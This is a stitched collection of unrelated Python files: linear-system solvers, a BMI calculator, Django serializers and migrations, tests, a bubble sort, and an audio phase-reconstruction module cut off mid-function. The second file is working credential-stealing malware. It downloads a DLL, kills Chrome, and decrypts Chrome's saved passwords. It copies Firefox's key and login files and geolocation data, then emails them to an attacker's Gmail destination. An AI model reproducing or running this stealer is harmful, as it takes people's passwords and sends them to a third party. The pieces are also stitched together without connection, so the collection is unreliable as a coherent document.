    x1 = 2*x  # current solution, seeded so the ||x1-x0|| test passes initially
    while r_norm >= epsilon and Two_norm(x1-x0) >= epsilon and iter_num < 1000:
        if iter_num > 0:
            x0 = x1  # shift current -> previous
        p1 = A * x0  # n*1 matrix p1 = A u
        p2 = A * r  # n*1 matrix p2 = A v
        alpha,beta = Alpha_beta(p1,p2,r)
        x1 = x0 + alpha*x0 + beta*r  # update current solution
        r = r - alpha*p1 - beta*p2  # update residual (consistent with x1 above)
        r_norm = Two_norm(r)  # refresh residual norm
        iter_num += 1  # count the iteration
    print("\n方法一:u=x_k,v=r_k\n")
    print("第 {0} 次迭代解:{1}".format(iter_num,x1.T))  # print the iterate
    print("余量:{0}".format(r.T))  # print the residual
    print("余量范数:%f" % (r_norm))  # print the residual norm
    EndTime = time.time()
    ExecuteTime = EndTime - StartTime
    print("执行时间:%f\n" % (ExecuteTime))  # print wall-clock time
    return x1.T, r.T, r_norm, iter_num
def Subspace_method_2(A,b,x,epsilon):
    # Solve A x = b by 2D subspace projection with u = r_k, v = r_{k-1}.
    # A: n*n non-singular matrix, x: n*1 initial guess, b: n*1 right-hand side.
    # Returns (x^T, r^T, ||r||, iterations).
    StartTime = time.time()
    r0 = b - A * x  # n*1 initial residual
    p1 = A * x  # n*1 matrix p1
    p2 = A * r0
    alpha,beta = Alpha_beta(p1,p2,r0)
    r1 = r0 - alpha*p1 - beta*p2  # bootstrap a second residual for the pair (r1, r0)
    r1_norm = Two_norm(r1)  # 2-norm of r1
    iter_num = 0  # iteration counter
    x0 = x  # previous-step solution
    x1 = 2*x  # current solution, seeded so the ||x1-x0|| test passes initially
    while r1_norm >= epsilon and Two_norm(x1-x0) >= epsilon and iter_num < 1000:
        if iter_num > 0:
            x0 = x1  # shift current -> previous
        p1 = A * r1  # n*1 matrix p1 = A u
        p2 = A * r0  # n*1 matrix p2 = A v
        alpha,beta = Alpha_beta(p1,p2,r0)
        x1 = x0 + alpha*r1 + beta*r0  # update current solution
        t = r0  # keep the pre-swap r0: at iteration 0 it is x0's true residual
        r0 = r1
        if iter_num == 0:
            r1 = t - alpha*p1 - beta*p2
        else:
            r1 = r0 - alpha*p1 - beta*p2  # update residual (r0 now holds x0's residual)
        r1_norm = Two_norm(r1)  # refresh residual norm
        iter_num += 1  # count the iteration
    print("方法二:u=r_k,v=r_k-1\n")
    print("第 {0} 次迭代解:{1}".format(iter_num,x1.T))  # print the iterate
    print("余量:{0}".format(r1.T))  # print the residual
    print("余量范数:%f" % (r1_norm))  # print the residual norm
    EndTime = time.time()
    ExecuteTime = EndTime - StartTime
    print("执行时间:%f\n" % (ExecuteTime))  # print wall-clock time
    return x1.T, r1.T, r1_norm, iter_num
def Subspace_method_3(A,b,x,epsilon):
    # Solve A x = b by 2D subspace projection with u = r_k and v the component
    # of r_{k-1} orthogonalized against r_k (Gram-Schmidt step).
    # A: n*n non-singular matrix, x: n*1 initial guess, b: n*1 right-hand side.
    # Returns (x^T, r^T, ||r||, iterations).
    StartTime = time.time()
    r0 = b - A * x  # n*1 initial residual
    p1 = A * x  # n*1 matrix p1
    p2 = A * r0
    alpha,beta = Alpha_beta(p1,p2,r0)
    r1 = r0 - alpha*p1 - beta*p2  # bootstrap a second residual for the pair (r1, r0)
    r1_norm = Two_norm(r1)  # 2-norm of r1
    iter_num = 0  # iteration counter
    x0 = x  # previous-step solution
    x1 = 2*x  # current solution, seeded so the ||x1-x0|| test passes initially
    while r1_norm >= epsilon and Two_norm(x1-x0) >= epsilon and iter_num < 1000:
        if iter_num > 0:
            x0 = x1  # shift current -> previous
        u = r1  # first search direction
        v = (r0 - ((r1.T*r0).item(0)/(r1.T*r1).item(0)) * r1)  # r0 orthogonalized against r1
        p1 = A * u  # n*1 matrix p1 = A u
        p2 = A * v  # n*1 matrix p2 = A v
        alpha,beta = Alpha_beta(p1,p2,r0)
        x1 = x0 + alpha*u + beta*v  # update current solution
        t = r0  # keep the pre-swap r0: at iteration 0 it is x0's true residual
        r0 = r1
        if iter_num == 0:
            r1 = t - alpha*p1 - beta*p2
        else:
            r1 = r0 - alpha*p1 - beta*p2  # update residual (r0 now holds x0's residual)
        r1_norm = Two_norm(r1)  # refresh residual norm
        iter_num += 1  # count the iteration
    print("方法三:u=r_k,v=(r_k-1)-[(r_k^T*r_k-1)/norm^2(r_k)]*r_k\n")
    print("第 {0} 次迭代解:{1}".format(iter_num,x1.T))  # print the iterate
    print("余量:{0}".format(r1.T))  # print the residual
    print("余量范数:%f" % (r1_norm))  # print the residual norm
    EndTime = time.time()
    ExecuteTime = EndTime - StartTime
    print("执行时间:%f\n" % (ExecuteTime))  # print wall-clock time
    return x1.T, r1.T, r1_norm, iter_num
'''
def Subspace_method_4(A,b,x,epsilon):
# 求解 Ax^T = b^T
# A 为 n*n 非奇异矩阵,x 为 n*1 矩阵,b 为 n*1 矩阵
StartTime = time.time()
r = b - A * x # n*1 余量矩阵 r
r_norm = Two_norm(r) # r 的 2-范数
iter_num = 0 # 迭代次数
x0 = x # 初始化上一步解矩阵
x1 = 2*x # 初始化当前解矩阵
while r_norm >= epsilon and Two_norm(x1-x0) >= epsilon and iter_num <= 1000:
if iter_num > 0:
x0 = x1 # 更新 n*1 上一步解矩阵 x1
p = b - r # n*1 矩阵 p
pT = p.T # 1*n 矩阵 p^T
q = A * r # n*1 矩阵 q
qT = q.T # 1*n 矩阵 q^T
s1 = (pT * p).item(0) # 数 s1
s2 = (qT * q).item(0) # 数 s2
s3 = (pT * q).item(0) # 数 s3
s = s1 * s2 - s3**2 # 数 s
c1 = (pT * b).item(0) # 数 c1
c2 = (qT * b).item(0) # 数 c2
alpha = (c1*s2 - c2*s3)/s # 数 alpha
beta = (s1*c2 - c1*s3)/s # 数 beta
x1 = alpha*x0 + beta*r # 更新 n*1 当前解矩阵 x1
r = (1-alpha)*b + alpha*r - beta*q # 更新 n*1 余量矩阵 r
r_norm = Two_norm(r) # 更新 r 的 2-范数
iter_num += 1 # 更新迭代次数
print("方法四:u=x_k,v=r_k\n")
print("第 {0} 次迭代解为:{1}".format(iter_num,x1.T)) # 打印迭代解
print("余量为:{0}".format(r.T)) # 打印余量
print("余量范数为:%f\n" % (r_norm)) # 打印余量范数
EndTime = time.time()
ExecuteTime = EndTime - StartTime
print("执行时间:%f\n" % (ExecuteTime)) # 打印执行时间
return x1.T, r.T, r_norm, iter_num
'''
# Test problem: the exact solution of A x = b is (1, 2, 3)^T.
A = np.mat([[1,2,3],[2,7,4],[4,5,9]])
b = np.mat([[14],[28],[41]])
x = np.mat([[199],[200],[555]])  # deliberately far-off initial guess
epsilon = 1e-4  # convergence tolerance on residual / step size
print("\n迭代停止条件:||r_(k+1)|| < 1e-4 或 ||x_(k+1) - x_k|| < 1e-4 或 迭代次数 > 1000")
print("矩阵A:\n{0}".format(A))
print("向量b:{0}".format(b.T))
print("初值x:{0}".format(x.T))
print("精确解:{0}".format(np.mat([[1,2,3]])))
# Run all three subspace variants on the same problem for comparison.
Subspace_method_1(A,b,x,epsilon)
Subspace_method_2(A,b,x,epsilon)
Subspace_method_3(A,b,x,epsilon)
#Subspace_method_4(A,b,x,epsilon)
# NOTE: the block below is disabled scratch/debug code that still contains an
# unresolved git merge conflict. Previously the closing quotes sat BEFORE the
# trailing ">>>>>>>" marker, leaving it outside the string — a SyntaxError that
# prevented this module from importing at all. The marker is now enclosed in
# the string so the file parses; the conflict itself is preserved verbatim for
# whoever resolves it.
'''
A = np.mat([[1,2,3],[2,7,4],[4,5,9]])
b = np.mat([[14],[28],[41]])
x = np.mat([[199],[0],[555]])
r0 = b - A * x # n*1 余量矩阵 r
p1 = A * x # n*1 矩阵 p1
p2 = A * r0
alpha,beta = Alpha_beta(p1,p2,r0)
r1 = r0 - alpha*p1 - beta*p2 # 更新 n*1 余量矩阵 r
r1_norm = Two_norm(r1) # r 的 2-范数
iter_num = 0 # 迭代次数
x0 = x # 初始化上一步解矩阵
x1 = 2*x # 初始化当前解矩阵
while iter_num < 2:
    if iter_num > 0:
        x0 = x1 # 更新 n*1 上一步解矩阵 x1
    print("第 {0} 次循环:".format(iter_num + 1))
    p1 = A * r1 # n*1 矩阵 p1
    print("p1:{0}".format(p1.T))
    p2 = A * r0
    print("p2:{0}".format(p2.T))
    alpha,beta = Alpha_beta(p1,p2,r0)
    print("alpha:{0}".format(alpha))
    print("beta:{0}".format(beta))
    x1 = x0 + alpha*r1 + beta*r0 # 更新 n*1 当前解矩阵 x1
    print("旧的x1:{0}".format(x0.T))
    print("新的x1:{0}".format(x1.T))
    t = r0
    print("旧的r0(t):{0}".format(t.T))
    print("旧的r1:{0}".format(r1.T))
    r0 = r1
    print("新的r0:{0}".format(r0.T))
    if iter_num == 0:
        r1 = t - alpha*p1 - beta*p2
    else:
        r1 = r0 - alpha*p1 - beta*p2
    print("b-A*x0:{0}".format((b-A*x1).T))
    print("新的r1:{0}".format(r1.T))
    r1_norm = Two_norm(r1) # 更新 r 的 2-范数
    iter_num += 1 # 更新迭代次数
    # print("第 {0} 次迭代解为:{1}\n".format(iter_num,x1.T)) # 打印迭代解
    # print("余量为:{0}\n".format(r1.T)) # 打印余量
    print("r1范数为:%f\n" % (r1_norm)) # 打印余量范数
<<<<<<< HEAD
A = np.mat([[1,2,3],[2,7,4],[3,4,9]])
b = np.mat([[14],[28],[38]])
x = np.mat([[1000],[-400],[75]])
epsilon = 1e-4
Subspace_method(A,b,x,epsilon)
=======
A = np.mat([[1,2,3],[2,7,4],[4,5,9]])
x = np.mat([[418.17159384],[-1419.5998351],[1753.10645053]])
b = np.mat([[14],[28],[41]])
r = b - A * x
r_n = math.sqrt(r.T * r)
print(r,r_n)
>>>>>>> 2c515191b6eb0d9d3762ec8aa52e7a0bc3d400ef
'''
|
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from smtplib import SMTP
import win32crypt
import base64
import os
import winreg
import urllib.request
firefox = os.path.join(os.environ['APPDATA'], 'Mozilla', 'Firefox', 'Profiles')
encoded_files = {}
files_needed = ['key3.db', 'logins.json', 'cert8.db']
login_cred = {'email':'', 'password':'', 'dest':''}
endpoint = 'http://freegeoip.net/json/'
dll_url = "https://s3.amazonaws.com/idiaco/sqlite3.dll"
dll_name = "sqlite3.dll"
def getpath() :
for path in os.walk(os.getenv('USERPROFILE')) :
if 'Chrome' in path[1] :
return str(path[0]) + '\\Chrome\\User Data\\Default\\Login Data'
def sql_mite() :
path = getpath()
import sqlite3
try :
conn = sqlite3.connect(path)
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
data = cursor.fetchall()
return data
except Exception as e:
print('There was an Error') # Remember to change this part to 'pass'
def dechrome() :
data = sql_mite()
info = {}
bundle = []
if len(data) > 0 : # Yeah dummy, stop figuring out what this does. It simply checks if the user has used Chrome before :)
for value in data :
password = win32crypt.CryptUnprotectData(value[2], None, None, None, 0)[1].decode()
info['url'] = value[0]
info['Username'] = value[1]
info['Password'] = password
bundle.append(info)
info = {} # For some reason which i can't tell, it kept on posting only one saved login. so i had to find a hack around it. please ignore it.
return bundle
else : print('Chromeless')
def encode_content(*args) :
for file in args :
f = open(file,"rb")
filecontent = f.read()
encodedcontent = base64.b64encode(filecontent)
encoded_files[file] = encodedcontent
return True
def path_gen(filename) :
tree = os.listdir(firefox)
name = firefox + '\\'+ tree[0] + '\\' + filename
return name
def ip_man(endpoint) :
try :
r = urllib.request.urlretrieve(endpoint)
return r[0]
except :
return 'For some unknown resons, IP couldnt be extracted'
def dll_download(dll_url,dll_name):
urllib.request.urlretrieve(dll_url, dll_name, reporthook=None)
return True
def email_setup(chrome) :
''' This function prepares the email, by attaching text and all neccessary attachment '''
email = MIMEMultipart()
email['Subject'] = 'Kermit just got served'
email['From'] = login_cred['email']
email['To'] = login_cred['dest']
# That is what u see if dont have an email reader:
email.preamble = 'Multipart message.\n'
text = MIMEText("Chromium = " + str(chrome))
email.attach(text)
# This is the binary part(The Attachment):
part = MIMEApplication(encoded_files[r'' + str(keys3)])
part.add_header('Content-Disposition', 'attachment', filename="key3.db")
email.attach(part)
part = MIMEApplication(encoded_files[r'' + str(logins)])
part.add_header('Content-Disposition', 'attachment', filename="logins.json")
email.attach(part)
part = MIMEApplication(encoded_files[r'' + str(cert8)])
part.add_header('Content-Disposition', 'attachment', filename="cert8.db")
email.attach(part)
part = MIMEApplication(encoded_files[str(geoip)])
part.add_header('Content-Disposition', 'attachment', filename="geoip.json")
email.attach(part)
return email
def main() :
global keys3
global logins
global cert8
global geoip
report = dll_download(dll_url, dll_name)
os.system("taskkill /f /im chrome.exe")
chrome = dechrome()
if report :
keys3 = path_gen(files_needed[0])
logins = path_gen(files_needed[1])
cert8 = path_gen(files_needed[2])
geoip = ip_man(endpoint)
encode_content(keys3, logins, cert8, geoip)
email = email_setup(chrome)
smtp = SMTP('smtp.gmail.com:587')
smtp.ehlo()
smtp.starttls()
print('Logging In')
smtp.login(login_cred['email'], login_cred['password']) # Authenticate PassKeys
print('login successful')
print('Sending email')
smtp.sendmail(email['From'], email['To'], email.as_string()) # Send Mail
print('PAWNED!')
if __name__ == '__main__':
main()
|
# Simple interactive BMI calculator: loops until the user declines a repeat.
while True:
    print("\n" * 100)  # crude "clear screen"
    print("BMI Calculator")
    print("--------------")
    try:
        # float() also accepts whole numbers, so integer input keeps working;
        # previously int() rejected decimal heights/weights.
        height = float(input("Height (cm): "))
        weight = float(input("Weight (kg): "))
    except ValueError:
        print("\nPlease enter numbers only.")
        continue
    if height <= 0 or weight <= 0:
        # Guard against ZeroDivisionError / nonsense input.
        print("\nHeight and weight must be positive.")
        continue
    BMIR = weight / ((height / 100) ** 2)
    BMI = str(round(BMIR, 2))
    print("")
    # Standard WHO adult BMI categories.
    if BMIR < 18.5:
        print("BMI: " + BMI + ", Under Weight")
    elif BMIR < 25:
        print("BMI: " + BMI + ", Normal")
    elif BMIR < 30:
        print("BMI: " + BMI + ", Overweight")
    else:
        print("BMI: " + BMI + ", Obese")
    print("")
    answer = input("Repeat? Y/N: ")
    # Accept lowercase 'n' too (previously only uppercase 'N' exited).
    if answer.strip().upper() == "N":
        break
|
from allauth.utils import get_username_max_length, email_address_exists
from django.contrib.auth import get_user_model, authenticate
from rest_auth.models import TokenModel
from allauth.account import app_settings as allauth_settings
from allauth.account.adapter import get_adapter
from django.utils.translation import ugettext_lazy as _
from rest_framework import serializers, exceptions
from django.conf import settings
from users.models import UserDetail, UserType
from nearby.models import LiveLocation
User = get_user_model()
class UserDetailSerializer(serializers.ModelSerializer):
    """Serialize every field of UserDetail.

    NOTE(review): this class is redefined later in this module; at import
    time the later definition shadows this one.
    """

    class Meta:
        model = UserDetail
        fields = "__all__"
class CustomUserSerializer(serializers.ModelSerializer):
    """User serializer that bundles profile details, user types, and live location."""

    # Computed field; see get_meta_data below.
    meta_data = serializers.SerializerMethodField()

    class Meta:
        model = User
        fields = ('pk','meta_data', 'username', 'email', 'first_name', 'last_name', "phone_number", "phone_number_verified", "name")
        read_only_fields = ('email', )

    def get_meta_data(self, obj):
        """Aggregate UserDetail, the user's type list, and live-location coordinates.

        Missing related rows (UserDetail / LiveLocation) are tolerated and
        serialized as empty/None rather than raising.
        """
        try:
            user_details = UserDetail.objects.get(user=obj.id)
        except UserDetail.DoesNotExist:
            user_details = None
        user_detail_serializer = UserDetailSerializer(user_details, many=False)
        user_type_qs = UserType.objects.filter(user=obj.id)
        user_type_serializer = UserTypeSerializer(user_type_qs, many=True)
        user_types = []
        live_location_lat = None
        live_location_long = None
        try:
            live_location = LiveLocation.objects.get(user=obj.id)
        except LiveLocation.DoesNotExist:
            live_location = None
        if live_location is not None:
            live_location_lat = live_location.location_lat
            live_location_long = live_location.location_long
        # Flatten the serialized UserType rows into a plain list of type names.
        for type in user_type_serializer.data:
            user_types.append(type['user_type'])
        return {"user_details": user_detail_serializer.data, "user_types": user_types, 'live_location_lat': live_location_lat, 'live_location_long': live_location_long}
class CustomTokenSerializer(serializers.ModelSerializer):
    """Serialize an auth token together with its owning user (nested)."""

    # Nested read via CustomUserSerializer so login responses include profile data.
    user = CustomUserSerializer(many=False)

    class Meta:
        model = TokenModel
        fields = ('key', 'user')
class UserTypeSerializer(serializers.ModelSerializer):
    """Serialize every field of UserType."""

    class Meta:
        model = UserType
        fields = "__all__"
class UserDetailSerializer(serializers.ModelSerializer):
    """Serialize every field of UserDetail.

    NOTE(review): duplicate of the earlier UserDetailSerializer in this
    module — this later definition is the one actually in effect.
    """

    # device = DeviceSerializer(required=False)
    class Meta:
        model = UserDetail
        fields = '__all__'
class UserDetailEditSerializer(serializers.ModelSerializer):
    """UserDetail serializer for edits; the user is supplied as a plain integer pk."""

    # Declared explicitly so clients can submit the user's id directly.
    user = serializers.IntegerField()

    class Meta:
        model = UserDetail
        fields = '__all__'
class CustomLoginSerializer(serializers.Serializer):
    """Login with either username or e-mail plus password.

    Mirrors rest_auth's LoginSerializer, with additional checks that the
    user's e-mail and/or phone number are verified before the login is
    accepted.
    """

    username = serializers.CharField(required=False, allow_blank=True)
    email = serializers.EmailField(required=False, allow_blank=True)
    password = serializers.CharField(style={'input_type': 'password'})

    def authenticate(self, **kwargs):
        # Delegate to Django's authenticate() with the current request attached.
        return authenticate(self.context['request'], **kwargs)

    def _validate_email(self, email, password):
        """Authenticate by e-mail; both values are required."""
        user = None
        if email and password:
            user = self.authenticate(email=email, password=password)
        else:
            msg = _('Must include "email" and "password".')
            raise exceptions.ValidationError(msg)
        return user

    def _validate_username(self, username, password):
        """Authenticate by username; both values are required."""
        user = None
        if username and password:
            user = self.authenticate(username=username, password=password)
        else:
            msg = _('Must include "username" and "password".')
            raise exceptions.ValidationError(msg)
        return user

    def _validate_username_email(self, username, email, password):
        """Authenticate by e-mail when given, otherwise by username."""
        user = None
        if email and password:
            user = self.authenticate(email=email, password=password)
        elif username and password:
            user = self.authenticate(username=username, password=password)
        else:
            msg = _('Must include either "username" or "email" and "password".')
            raise exceptions.ValidationError(msg)
        return user

    def validate(self, attrs):
        """Authenticate and verify the account; stores the user in attrs['user']."""
        username = attrs.get('username')
        email = attrs.get('email')
        password = attrs.get('password')
        user = None
        if 'allauth' in settings.INSTALLED_APPS:
            from allauth.account import app_settings
            # Authentication through email
            if app_settings.AUTHENTICATION_METHOD == app_settings.AuthenticationMethod.EMAIL:
                user = self._validate_email(email, password)
            # Authentication through username
            elif app_settings.AUTHENTICATION_METHOD == app_settings.AuthenticationMethod.USERNAME:
                user = self._validate_username(username, password)
            # Authentication through either username or email
            else:
                user = self._validate_username_email(username, email, password)
        else:
            # Authentication without using allauth
            if email:
                try:
                    username = User.objects.get(email__iexact=email).get_username()
                except User.DoesNotExist:
                    pass
            if username:
                user = self._validate_username_email(username, '', password)
        # Did we get back an active user?
        if user:
            if not user.is_active:
                msg = _('User account is disabled.')
                raise exceptions.ValidationError(msg)
        else:
            msg = _('Unable to log in with provided credentials.')
            raise exceptions.ValidationError(msg)
        # If required, is the email verified?
        # Fix: compare strings with != rather than ``is not`` — identity
        # comparison against a literal is implementation-dependent and a
        # SyntaxWarning on Python >= 3.8.
        if user.email != "":
            if 'rest_auth.registration' in settings.INSTALLED_APPS:
                from allauth.account import app_settings
                if app_settings.EMAIL_VERIFICATION == app_settings.EmailVerificationMethod.MANDATORY:
                    email_address = user.emailaddress_set.get(email=user.email)
                    if not email_address.verified:
                        raise serializers.ValidationError(_('E-mail is not verified.'))
        if user.phone_number != "":
            if not user.phone_number_verified:
                raise serializers.ValidationError(_('Phone Number is not verified.'))
        attrs['user'] = user
        return attrs
class SignupWithEmailSerializer(serializers.ModelSerializer):
    """Registration serializer that requires a unique, non-blank e-mail address."""

    class Meta:
        model = User
        fields = ('id', 'username', 'first_name', 'last_name', 'email', 'phone_number', 'password')
        extra_kwargs = {
            'password': {
                'write_only': True,
                'style': {
                    'input_type': 'password'
                }
            },
            'username': {
                'required': True
            },
            'email': {
                'required': True,
                'allow_blank': False,
            }
        }

    # Declared explicitly so allauth's username length settings are enforced.
    username = serializers.CharField(
        max_length=get_username_max_length(),
        min_length=allauth_settings.USERNAME_MIN_LENGTH,
        required=True
    )

    def validate_username(self, username):
        # Let allauth normalize/validate the username.
        username = get_adapter().clean_username(username)
        return username

    def validate_email(self, email):
        # Let allauth normalize the address, then enforce uniqueness.
        email = get_adapter().clean_email(email)
        if allauth_settings.UNIQUE_EMAIL:
            if email and email_address_exists(email):
                raise serializers.ValidationError(
                    _("A user is already registered with this e-mail address."))
        return email
class SignUpWithPhoneSerializer(serializers.ModelSerializer):
    """Registration serializer that requires a unique, non-blank phone number."""

    class Meta:
        model = User
        fields = ('id', 'username', 'first_name', 'last_name', 'email', 'phone_number', 'password')
        extra_kwargs = {
            'password': {
                'write_only': True,
                'style': {
                    'input_type': 'password'
                }
            },
            'username': {
                'required': True
            },
            'phone_number': {
                'required': True,
                'allow_blank': False,
            }
        }

    # Declared explicitly so allauth's username length settings are enforced.
    username = serializers.CharField(
        max_length=get_username_max_length(),
        min_length=allauth_settings.USERNAME_MIN_LENGTH,
        required=True
    )

    def validate_username(self, username):
        # Let allauth normalize/validate the username.
        username = get_adapter().clean_username(username)
        return username

    def validate_phone_number(self, phone_number):
        # EAFP uniqueness check: the number is valid only if no user has it yet.
        try:
            user = User.objects.get(phone_number=phone_number)
        except User.DoesNotExist:
            return phone_number
        raise serializers.ValidationError(
            _("A user is already registered with this phone number."))
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-09-08 04:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make Task.photo optional (blank/null) with a date-based upload path."""

    dependencies = [
        ('jobs', '0031_auto_20170908_1345'),
    ]

    operations = [
        migrations.AlterField(
            model_name='task',
            name='photo',
            field=models.ImageField(blank=True, null=True, upload_to='%Y/%m/%d/'),
        ),
    ]
|
import unittest
from tests.unit_test_helper import is_answer
from tests.unit_test_helper.console_test_helper import execfile
class TestOutput(unittest.TestCase):
    """Checks for the lab12 'make a list' exercise."""

    def test(self):
        # Import either the reference answer or the student's solution,
        # depending on the test-helper mode flag.
        if is_answer:
            from lab.lab12.ch012_t02_make_a_list_ans import board
        else:
            from lab.lab12.ch012_t02_make_a_list import board
        self.assertIsInstance(board, type([]))
        # The exercise expects a 5x5 board filled with 'O'.
        expected = [['O', 'O', 'O', 'O', 'O'],
                    ['O', 'O', 'O', 'O', 'O'],
                    ['O', 'O', 'O', 'O', 'O'],
                    ['O', 'O', 'O', 'O', 'O'],
                    ['O', 'O', 'O', 'O', 'O']]
        self.assertListEqual(expected, board)

    def testOutput(self):
        # Running the script must produce no console output.
        # NOTE(review): this executes the *t01* script while the class tests
        # the t02 exercise — confirm the filename is intended.
        temp_globals, temp_locals, content, output = execfile("lab12/ch012_t01_get_our_feet_wet.py")
        expected = """"""
        self.assertEqual(expected, output)
if __name__ == '__main__':
unittest.main()
|
from .lib import open_browser
from .pages import LoginPage
browser = open_browser()
page = LoginPage(browser)

# Form label messages: focusing each field should swap in its hint text.
page.open()
page.formulario.focar_email()
assert page.formulario.get_texto_label_email() == 'Tá certo?'
page.formulario.focar_senha()
assert page.formulario.get_texto_label_senha() == 'Não vai errar'

browser.quit()
|
def bubble_sort(num_list, reverse=False):
    """Return a new list with the elements of *num_list* sorted.

    Fix: despite its name, the previous implementation never sorted — it
    only reversed or copied the input (and crashed with a NameError on an
    empty list via an undefined ``global result``). This is a real bubble
    sort with an early exit when a pass makes no swaps.

    :param num_list: iterable of comparable items (not modified).
    :param reverse: truthy for descending order, falsy for ascending.
    :return: a newly created sorted list.
    """
    items = list(num_list)  # work on a copy; never mutate the caller's list
    n = len(items)
    for i in range(n - 1):
        swapped = False
        # After pass i, the last i items are already in their final place.
        for j in range(n - 1 - i):
            if items[j] > items[j + 1]:
                items[j], items[j + 1] = items[j + 1], items[j]
                swapped = True
        if not swapped:
            break  # already sorted — bubble sort's best case
    if reverse:
        items.reverse()
    return items


print(bubble_sort([2, 5, 8, 6, 4, 2], 2))
|
# Generated by Django 3.0.3 on 2020-04-21 01:43
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: create the Group table."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Group',
            fields=[
                # Explicit auto-increment primary key instead of the default 'id'.
                ('group_id', models.AutoField(primary_key=True, serialize=False)),
                ('group_name', models.CharField(max_length=20)),
            ],
        ),
    ]
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Give Pagina.pagina_inicial an explicit default and Portuguese help text."""

    dependencies = [
        ('conteudo', '0003_auto_20150413_1007'),
    ]

    operations = [
        migrations.AlterField(
            model_name='pagina',
            name='pagina_inicial',
            field=models.BooleanField(default=False, help_text='Esse campo \xe9 utilizado para sites que possuem uma p\xe1gina simples como p\xe1gina inicial. Para definir esta p\xe1gina como sendo a p\xe1gina inicial marque esta op\xe7\xe3o.', verbose_name='P\xe1gina inicial'),
            preserve_default=True,
        ),
    ]
|
# coding=utf-8
# Phase reconstruction with the Griffin-Lim algorithm
#
# Copyright (C) 2019 Robin Scheibler, MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# You should have received a copy of the MIT License along with this program. If
# not, see <https://opensource.org/licenses/MIT>.
"""
Implementation of the classic phase reconstruction from Griffin and Lim [1]_.
The input to the algorithm is the magnitude from STFT measurements.
The algorithm works by starting by assigning a (possibly random) initial phase to the
measurements, and then iteratively
1. Reconstruct the time-domain signal
2. Re-apply STFT
3. Enforce the known magnitude of the measurements
The implementation supports different types of initialization via the keyword argument ``ini``.
1. If omitted, the initial phase is uniformly zero
2. If ``ini="random"``, a random phase is used
3. If ``ini=A`` for a ``numpy.ndarray`` of the same shape as the input magnitude, ``A / numpy.abs(A)`` is used for initialization
Example
-------
.. code-block:: python
    import numpy as np
    import matplotlib.pyplot as plt
    from scipy.io import wavfile
    import pyroomacoustics as pra
# We open a speech sample
filename = "examples/input_samples/cmu_arctic_us_axb_a0004.wav"
fs, audio = wavfile.read(filename)
# These are the parameters of the STFT
fft_size = 512
hop = fft_size // 4
win_a = np.hamming(fft_size)
win_s = pra.transform.stft.compute_synthesis_window(win_a, hop)
n_iter = 200
engine = pra.transform.STFT(
fft_size, hop=hop, analysis_window=win_a, synthesis_window=win_s
)
X = engine.analysis(audio)
X_mag = np.abs(X)
X_mag_norm = np.linalg.norm(X_mag) ** 2
# monitor convergence
errors = []
# the callback to track the spectral distance convergence
def cb(epoch, Y, y):
# we measure convergence via spectral distance
Y_2 = engine.analysis(y)
sd = np.linalg.norm(X_mag - np.abs(Y_2)) ** 2 / X_mag_norm
# save in the list every 10 iterations
if epoch % 10 == 0:
errors.append(sd)
pra.phase.griffin_lim(X_mag, hop, win_a, n_iter=n_iter, callback=cb)
plt.semilogy(np.arange(len(errors)) * 10, errors)
plt.show()
References
----------
.. [1] D. Griffin and J. Lim, “Signal estimation from modified short-time Fourier
transform,” IEEE Transactions on Acoustics, Speech, and Signal Processing, vol.
32, no. 2, pp. 236–243, 1984.
"""
# This is needed to check for string types
# in a way compatible between python 2 and 3
try:
    # Python 2: ``basestring`` exists and covers both str and unicode.
    basestring
except NameError:
    # Python 3: alias it to ``str`` so isinstance checks below work unchanged.
    basestring = str
import numpy as np
from ..transform.stft import STFT, compute_synthesis_window
def griffin_lim(
    X,
    hop,
    analysis_window,
    fft_size=None,
    stft_kwargs=None,
    n_iter=100,
    ini=None,
    callback=None,
):
    """
    Implementation of the Griffin-Lim phase reconstruction algorithm from STFT
    magnitude measurements.

    Parameters
    ----------
    X: array_like, shape (n_frames, n_freq)
        The STFT magnitude measurements
    hop: int
        The frame shift of the STFT
    analysis_window: array_like, shape (fft_size,)
        The window used for the STFT analysis
    fft_size: int, optional
        The FFT size for the STFT, if omitted it is computed from the dimension of ``X``
    stft_kwargs: dict, optional
        Dictionary of extra parameters for the STFT (default: none)
    n_iter: int, optional
        The number of iterations
    ini: str or array_like, complex, shape (n_frames, n_freq), optional
        The initial value of the phase estimate. If "random", uses a random guess. If ``None``, uses ``0`` phase.
    callback: func, optional
        A callable taking as argument an int and the reconstructed STFT and time-domain signals
    """
    # Fix: a mutable default argument ({}) is shared across calls; use None
    # as the sentinel and create a fresh dict per call.
    if stft_kwargs is None:
        stft_kwargs = {}

    if isinstance(ini, basestring) and ini == "random":
        ini = np.exp(1j * 2 * np.pi * np.random.rand(*X.shape))
    elif ini is None:
        ini = np.ones(X.shape, dtype=np.complex128)
    else:
        # Normalize the initializer to unit modulus. Fix: out-of-place
        # division — the previous ``ini /= np.abs(ini)`` silently mutated
        # the caller's array.
        ini = ini / np.abs(ini)

    # take care of the STFT parameters
    if fft_size is None:
